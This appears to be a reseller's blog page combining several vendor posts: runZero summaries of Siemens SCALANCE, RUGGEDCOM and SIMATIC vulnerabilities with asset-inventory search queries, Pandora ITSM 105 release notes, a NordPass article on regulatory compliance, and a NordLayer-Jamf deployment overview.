SCALANCE and RUGGEDCOM products (August 2024)

Siemens disclosed multiple vulnerabilities for a variety of products and devices, including the SCALANCE and RUGGEDCOM product lines.

CVE-2024-41976 is rated high, with a CVSS score of 7.2, and allows an attacker to issue invalid VPN configuration data causing an authenticated attacker to execute arbitrary code.
CVE-2024-41977 is rated high, with a CVSS score of 7.1, and allows an attacker to escalate their privileges due to devices not properly enforcing user session isolation.
CVE-2024-41978 is rated high, with a CVSS score of 6.5, and allows an authenticated attacker to forge 2FA tokens of other users due to devices storing sensitive 2FA information in log files on disk.
CVE-2024-44321 is rated medium, with a CVSS score of 2.7, and allows an attacker to issue large input data causing an unauthenticated denial-of-service.

Successful exploitation of this vulnerability would allow an authenticated attacker to remotely execute code, escalate their privileges, or forge other users credentials. The first three do require attacks be authenticated initially to exploit these vulnerabilities.

The last vulnerability is on the lower score, but would still require the device be restarted if the denial-of-service condition was triggered.

Siemens recommends upgrading all affected devices to firmware V8.1 or later. Additionally, users should ensure these devices are isolated in their own networks to prevent unwanted network traffic to the device.

How to find potentially vulnerable systems

From the Asset Inventory, use the following query to locate systems running potentially vulnerable software:

hw:"RUGGEDCOM" OR hw:"SCALANCE" OR hw:"LOGO"

CVE-2024-35292 – SIMATIC S7-200 SMART Devices (July 2024)

In July 2024, Siemens disclosed a vulnerability in their SIMATIC S7-200 SMART Devices.

CVE-2024-35292 is rated high, with a CVSS score of 8.2, and allowed attackers to predict IP ID sequence numbers as their base method of attack and eventually could allow an attacker to create a denial-of-service condition. Successful exploitation of this vulnerability would allow an attacker to issue a denial-of-service condition. The only workaround was to restrict access to the network where the affected products were located by introducing strict access control mechanisms.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate systems running potentially vulnerable software:

hw:SIMATIC

SENTRON, SCALANCE, and RUGGEDCOM vulnerabilities (March 2024)

In March, 2024, Siemens released security advisories for a variety of products and devices, including the SENTRON, SCALANCE, and RUGGEDCOM product lines.

Several of the vulnerabilities had CVSS scores in the 7.0 to 8.9 range (high) and several more in the 9.0 to 10.0 range (critical).

For the full list of vulnerabilities, you can consult Siemens ProductCERT.

Several of these vulnerabilities allowed for unauthenticated remote code execution, allowing for compromise of the vulnerable systems. Other vulnerabilities could lead to privilege escalation, information disclosure, or denial of service. Users were urged to upgrade as quickly as possible. Siemens released updates via a variety of channels. See Siemens ProductCERT for details.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate Siemens assets that were potentially vulnerable:

hardware:Siemens OR hardware:RuggedCom

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

runZero 2025

Pandora ITSM 105: New Tools for More Efficient IT Management

With the new Pandora ITSM version 105, you now have features designed to improve your workflow and optimize ticket and project management.

Key Enhancements in Pandora ITSM 105

New Filtering System

You can now filter and view results more efficiently in Tickets, Users, Project Board, Contracts, and Invoices. This system will expand to more sections in future versions, allowing for greater flexibility in daily management.

Enhanced Ticket View

The layout of fields in tickets has been reorganized to improve visibility and ease of use. Additionally, a new contracts section has been included to streamline access to relevant information, ensuring a better user experience.

Customizable Ticket Design

You can now rearrange, add, or remove fields in the ticket view according to your needs, with real-time editable settings through the new filters. This flexibility allows each team to tailor Pandora ITSM to their specific workflow.

Mobile Timetracker Optimization

The mobile version of the timetracker has been redesigned to be more intuitive and functional. All options available in the web console have been incorporated, ensuring that users can efficiently manage their time anytime and from any device.

ChatGPT Support in Chat

ChatGPT has been integrated into Pandora ITSM’s chat feature, providing quick and accurate responses to technical or support inquiries. This integration enhances user assistance and facilitates real-time issue resolution.

Tags in Tickets and Projects

It is now possible to add tags to tickets and projects, making it easier to categorize and search for relevant information. This feature allows for quicker access to work items and improves internal organization.

New Project Management View

With a visual interface similar to Trello, this new view simplifies task and project management with tags, custom statuses, and greater organizational flexibility. Additionally, it enables easy task movement between columns for more dynamic tracking.

New Workflow for Timetracker

The timetracker workflow has been optimized, allowing the configuration of alerts and automated reminders to improve workday tracking. It is now possible to schedule notifications that warn about work-hour limits or forgotten check-ins.

Improvements in Management and Security

New Licensing System

Starting with this version, clients who update will need to request a new license through the Warp Update > License menu. This change ensures greater security and control over active licenses on the platform.

Database Update

To optimize performance and compatibility, upgrading to Pandora ITSM 105 requires migrating from MySQL 5 to MySQL 8. This update ensures greater stability and performance in data management, improving the overall operation of the platform. Refer to the official documentation for more details.

Other Improvements and Fixes

A new notification section has been added for super administrators.
Enhancements in data export and report customization.
Optimized interface for work unit management.
Updated integration with third-party systems for better compatibility.

Explore all the new features of Pandora ITSM 105 and optimize your team’s management.

Visit our official Wiki or check the technical documentation for more details on this version.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About PandoraFMS
Pandora FMS is a flexible monitoring system, capable of monitoring devices, infrastructures, applications, services and business processes.
Of course, one of the things that Pandora FMS can control is the hard disks of your computers.

Nord Security

Pandorafms 2025

Regulatory Compliance and NordPass

What is regulatory compliance?

Regulatory compliance refers to various processes and procedures of adhering to the laws, regulations, and standards set by various governing bodies. The regulations can come from numerous sources such as local, state, federal, or even international agencies, industry groups, and professional associations. The intention behind various regulatory compliance is to protect consumers and other stakeholders.

Importance of regulatory compliance

The aim of regulatory compliance is to make sure that businesses and organizations operate in a secure, responsible, and ethical manner. Regulatory compliance can also provide businesses and organizations with a competitive advantage by helping to create a culture of transparency and credibility with customers, employees, and other involved parties. Furthermore, adhering to regulatory compliance can improve internal processes, risk management procedures, and mitigate potential legal issues, which in turn lays a great foundation for a sustainable organization.

However, it’s critical to remember that most regulatory compliance is mandatory. Failing to comply with any of the mandatory regulations can result in hefty fines. For instance, LinkedIn Ireland has been fined more than $300 million by the Irish Data Protection Commission (DPC) for violation of the General Data Protection Regulation (GDPR). Met —the company formerly known as Facebook—was also recently fined over $250 million by the Irish DPC as well for a security breach that exposed the sensitive data of over 28 million users worldwide.

Besides financial losses, non-compliance can cause major damage to the organization’s reputation as clients may lose trust in the organization. This can even lead to serious legal issues.

Below are some of the most common regulatory compliance standards.

National Institute of Standards and Technology (NIST)

The National Institute of Standards and Technology (NIST ) is a US federal agency that develops technology, metrics, and standards to drive innovation and ensure operational security within a business environment. NIST compliance is mandatory for all US-based federal information systems except those related to national security. However, the standard can be adopted by any organization.

To be NIST-compliant, a company needs to implement access controls to limit the risk of unauthorized access, develop a comprehensive incident response plan, and devise audit procedures and schedules.

The General Data Protection Regulation (GDPR) is a data protection law that applies to businesses and organizations operating within the European Union (EU) and the European Economic Area (EEA). It sets out rules for how organizations can collect, use, and store personal data, and provides individuals the right to access and control their personal data.

To adhere to the GDPR, organizations and businesses need to implement measures such as obtaining consent from individuals before collecting their data, providing clear and concise information about their data collection practices, and implementing appropriate security measures to protect personal data.

Health Insurance Portability and Accountability Act (HIPAA)

The Health Insurance Portability and Accountability Act (HIPAA ) is a US law that sets out standards for the protection of personal health information. The law applies to healthcare providers and all other entities that handle personal health information in the US.

To meet the requirements set out by the HIPAA, organizations need to implement secure systems for storing and transmitting personal health information, providing training to employees on HIPAA requirements, and implementing access controls to prevent unauthorized access to personal health information.

Payment Card Industry Data Security Standard (PCI DSS)

The Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards that apply internationally to organizations that handle credit card transactions. The regulatory standard sets out requirements for protecting cardholder data and preventing unauthorized access to such data.

The PCI DSS regulations require businesses and organizations that process payment card information to implement secure systems for storing and transmitting cardholder data, conduct regular security assessments, and implement further security controls to prevent unauthorized access to cardholder data.

ISO/IEC 27001

The ISO/IEC 27001 is an international standard that outlines best practices for an information security management system (ISMS). The standard has been developed to help organizations protect their information assets and manage risks related to information security. The ISO/IEC 27001 is not a mandatory requirement.

To meet the ISO/IEC 27001 compliance, organizations need to conduct regular risk assessments, implement controls to protect against unauthorized access, and regularly review and update their information security management systems.

California Consumer Privacy Act (CCPA)

The California Consumer Privacy Act (CCPA) is a privacy law that in many ways mimics its European counterpart — the GDPR. However, the CCPA applies to businesses operating in California and it provides California residents with the right to access and control their personal data, and imposes certain requirements on businesses that collect and handle personal data.

For an organization to be CCPA compliant, it needs to implement security measures to protect customer data. Furthermore, companies are also required to provide clear and concise information about data collection practices, allowing California residents to request access to and deletion of their personal data.

Gramm-Leach-Bliley Act (GLBA)

The Gramm-Leach-Bliley Act (GLBA) is a US law that applies to financial institutions within the US. Like many of the regulatory compliance standards we already discussed, GLBA requires financial institutions to implement safeguards that would protect personal information as well as to disclose their data collection and sharing practices to customers.

To comply with the GLBA regulatory standards, financial institutions may need to implement secure systems for storing and transmitting personal financial information, providing customers with information about their data collection and sharing practices, and implementing access controls to prevent unauthorized access to personal financial information.

Center for Internet Security (CIS)

The Center for Internet Security (CIS) is a nonprofit organization that provides cybersecurity guidance and best practices to help organizations protect their systems and data. The CIS comprises 18 Critical Security Controls for identifying and protecting against the most common cyber threats.

To be CIS compliant, companies and organizations need to establish a comprehensive cybersecurity perimeter to ensure protection of their data and information management systems.

For a detailed guide on how NordPass can ease compliance with CIS controls, make use of our comprehensive CIS compliance guide.

Opinion 498

The Formal Opinion 498 outlined by the American Bar Association (ABA) provides guidance for US-based lawyers and law firms with regard to virtual practice. While the ABA Model Rules of Professional Conduct permit virtual practice, the Formal Opinion 498 provides an additional set of guidelines for virtual practice.

To follow the guidelines set out by the Opinion 498, organizations or individuals are urged to establish secure information management systems and protect them with complex passwords to ensure secure storage and access to client data.

Agence nationale de la sécurité des systèmes d’information (ANSSI)

ANSSI compliance combines a set of security standards set by the French National Cybersecurity Agency. The ANSSI has been developed as a regulatory standard in France to protect sensitive information and systems from cyber threats such as hacking, malware, and data breaches. Companies that store and handle sensitive information may be required to comply with the ANSSI standards in order to ensure the security of that information.

Compliance with the ANSSI standards may involve regular audits, penetration testing, and other security measures to identify and address vulnerabilities in a company’s systems.

Network and Information Security Directive 2 (NIS2)

The Network and Information Security Directive 2 (NIS2) is an updated cybersecurity directive issued by the European Union to make the critical sectors like energy, healthcare, finance, and digital infrastructure more resilient. The updated directive extends the scope of cybersecurity obligations for organizations through enhanced risk management measures, incident reporting procedures, and supply chain security. More specifically, under the NIS2, organizations are expected to implement security measures, conduct periodic cybersecurity training sessions, and introduce a stricter timeframe for reporting security incidents.

Digital Operational Resilience Act (DORA)

The Digital Operational Resilience Act (DORA) is an EU regulation developed to help raise the cyber resilience of financial institutions, such as banks, insurance companies, and investment firms. DORA provides a framework for managing IT risks by requiring organizations to adopt tight security controls, regularly assess their cybersecurity posture, and ensure that third-party vendors are in compliance with resilience standards. The regulation also dictates detailed incident reporting and response mechanisms to improve the financial sector’s resilience to cyber threats.

How can NordPass help with regulatory compliance?

Meeting regulations and staying compliant can be a complex and time-consuming process, as businesses and organizations must stay up-to-date with the latest regulatory requirements and implement appropriate policies, procedures, and tools.

However, with the right tools at your disposal compliance can be less of a hassle than you might think. One such tool is NordPass — a secure and easy-to-use password manager designed for business use and it can help your organization comply with the security guidelines and requirements outlined in the regulatory compliance standards listed above. But how exactly can it help?

Strong passwords and secure password storage

Most regulatory compliance standards require organizations to implement some sort of security measures to limit the possibility of unauthorized access.

For instance, PCI DSS, GLBA, GDPR, and CIS Controls all have outlined guidelines for ensuring the security of personal data processing and storage.

This is where NordPass comes in as a tool that can help. Designed by the principles of zero-knowledge architecture and equipped with an advanced XChaCha20 encryption algorithm, NordPass offers a secure way to store and access business passwords and other sensitive information in line with regulatory requirements.

Password Policy — a NordPass feature — can also play a critical role in compliance. Using Password Policy, companies can set certain specifications for password complexity for the entire organization, which can significantly fortify the overall security of the organization.

To easily follow Password Policy rules and specifications, users can use our very own Password Generator — a tool that can generate a password adhering to all the specifications outlined in the Password Policy in just a few clicks.

On top of that, NordPass can ensure that all of your organization’s passwords are stored securely and in line with the regulatory requirements.

Secure access management

Some compliance standards require organizations to implement secure access management solutions. For example, this is the case with ANSSI compliance as well as with HIPAA and NIST.

Here NordPass and its Admin Panel can play a major role because it is designed to provide organizations a way to effectively and easily manage access privileges across the entire organization.

Via the Admin Panel, solution Owners and Admins can grant or revoke access to systems as well as monitor member activity within the organization. The Admin Panel is also the place where you can set the Password Policy for the organization, ensuring that passwords throughout the company adhere to certain specifications.

Additionally, NordPass comes equipped with a feature called Activity Log, which allows organization Admins to review user action such as system access and item sharing. For advanced monitoring and security analysis, NordPass integrates directly with Splunk. Organizations that use other Security Information and Event Management (SIEM) solutions can still transfer or audit logs by exporting them in JSON format.

Sharing Hub is another integral feature that provides organization Owners with a detailed overview of all shared items and folders within the organization. Leveraging the Sharing Hub, Owners get details on who shared what and with whom, ensuring transparency and oversight of data.

Breach Monitoring

Regulatory compliance standards also tend to outline best practices for responding to a security incident such as a data breach. This is explicitly outlined in the GDPR’s Article 33, which states that data breach including personal data breach should be reported within 72 hours to the supervisory authority. Failing to do so may result in a fine of 10 million or 2% of annual revenue.

NordPass is equipped with a Data Breach Scanner — a tool that can scan the entire company’s domain list for potential breaches. Because the Data Breach Scanner issues a notification to all members of the organization, the company potentially affected by a breach can act quickly and efficiently to contain it.

The NordPass Password Health tool can help you detect potentially, weak, old, or reused passwords throughout the organization and significantly reduce the risk of unauthorized access. On top of that, NordPass offers the Exposed Passwords feature, which scans your organization’s saved passwords against a database of known compromised credentials found on the dark web. If any of the passwords have been leaked in a breach, the Exposed Passwords feature will notify you of that, allowing you to promptly update them to maintain proper account security.

Bottom line

These days, regulatory compliance is an inseparable part of running a business. Fail to comply and be ready to face hefty fines and serious reputational damage. However, compliance is never easy. But with the right tools at your disposal, the whole process can be a lot smoother.

NordPass can be a tool to assist organizations in meeting various requirements in an easier and more efficient way. By staying compliant, organizations can not only avoid costly fines and legal issues, but also gain a competitive advantage by building a culture of transparency and credibility with their customer base or investors.

About NordPass
NordPass is developed by Nord Security, a company leading the global market of cybersecurity products.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Nord Security NordPass 2025

Technology scalability & simplified app management on Apple devices

Summary: Jamf makes it simple to manage the NordLayer app on Apple devices, giving teams the flexibility to grow—without the usual IT headaches.

As businesses grow, so do their tech needs. More people, more devices, and more locations mean IT teams have to keep everything secure and running smoothly without slowing anyone down. For remote-first companies, that challenge is even bigger. Managing security and apps at scale can feel overwhelming, like juggling too many balls at once.

That’s where smart integrations, like Jamf and NordLayer, come in. Jamf makes it easy to manage the NordLayer app on Apple devices, giving teams the flexibility to grow without the usual IT headaches. This means your business can scale efficiently while keeping security tight and IT workloads manageable.

In this article, we’ll examine why technology scalability matters, the challenges of managing security at scale, and how NordLayer and Jamf collaborate to make it easier.

Technology scalability in IT and security

Technology scalability is the ability to expand your IT setup without compromising on performance or security. As companies grow, so does the need for flexible, secure solutions that work across remote and hybrid teams.

For remote-first or hybrid teams, scalability means easy access to tools, the ability to manage security from anywhere, and the flexibility to adapt to changing needs. It also ensures smooth collaboration across different locations. However, growth brings challenges, particularly in terms of security and managing an increased number of devices.

In short, IT scalability is about staying flexible, adapting to change, and maintaining strong security as your business grows.

Challenges of managing security at scale

We’ve already mentioned that when a business grows, so do the complexities of managing technologies. An increasing number of people, devices, and locations adds to the IT teams’ plate. The pressure is on to keep everything secure and running smoothly. For remote-first companies, it’s even trickier. Securing apps and devices at scale can quickly become overwhelming.

For teams scaling quickly, the challenge is onboarding and offboarding employees across multiple devices. IT teams need to keep security consistent across Apple devices, ensure compliance, and stay on top of updates without constantly doing it manually. On top of that, finding the right balance between strong security and a smooth experience for both IT teams and employees adds complexity.

These challenges show why automated solutions are key. They simplify device management and improve security without adding more work. With streamlined processes, businesses can grow faster while keeping everything secure.

How Jamf simplifies NordLayer app management on Apple devices

Managing security shouldn’t feel like a chore. Yet, for many IT managers, keeping apps updated and configured across Apple devices is an endless loop of manual work. That’s where Jamf, a leader in Apple Mobile Management (MDM), and NordLayer step in, offering a seamless, automated solution that cuts the hassle and boosts security.

IT teams need tools that operate in the background rather than adding extra work. Jamf integration with NordLayer makes security effortless, keeping Apple devices protected without IT constantly stepping in.

Managing NordLayer is simple with Jamf Cloud. Here’s how to set up centralized distribution in just a few easy steps:

Automated deployment: Roll out NordLayer to all Apple devices in a few clicks without complex setup.
Automatic updates: Ensure devices always have the latest security features, with no manual updates needed.
Security policy enforcement: Keep NordLayer security policies in place automatically, reducing compliance risks.
Centralized management with NordLayer’s Control Panel: Easily handle deployments and security updates of all Apple devices from one dashboard.

This automated approach enables IT teams to work smarter, spending less time on NordLayer app management and more on strategic priorities.

“As more businesses rely on Apple devices, security needs to be both strong and simple. The NordLayer and Jamf integration delivers just that—seamless protection without extra complexity,“ says Artūras Bubokas, Product Manager at NordLayer.

Benefits of using Jamf and NordLayer

By combining Jamf’s seamless Apple device management with NordLayer’s strong network security, businesses get an automated, hassle-free solution. The result? Stronger security, less manual work, and more time for IT teams to focus on what truly matters.

Now, let’s break down the key benefits of this integration.

Saves IT time: Cuts down on manual configuration and troubleshooting
Boosts security: Ensures consistent, up-to-date security across Apple devices
Reduces costs: Lowers IT overhead with automated management
Improves user experience: Integrates security seamlessly without disrupting workflows
Supports growth: Scales easily as teams and devices expand

How to deploy NordLayer via Jamf

Here is how you can set up NordLayer on Apple devices in a few steps:

Download NordLayer package (.pkg for macOS, App Store link for iOS)
Upload it to the Jamf Cloud and configure policies
Automate installation and updates for all Apple devices
Ensure compliance with security policies using Jamf’s management tools

For more information on how to integrate Jamf and NordLayer, please check our mini-guide.

How NordLayer can help

A strong, scalable security strategy is essential for modern businesses, especially with the growing number of Apple devices in the workplace. The NordLayer & Jamf integration makes security simple, giving IT teams full control while keeping users productive. With easy deployment, automated updates, and centralized management, businesses can protect company resources without disrupting workflows.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

NordLayer 2025 Nord Security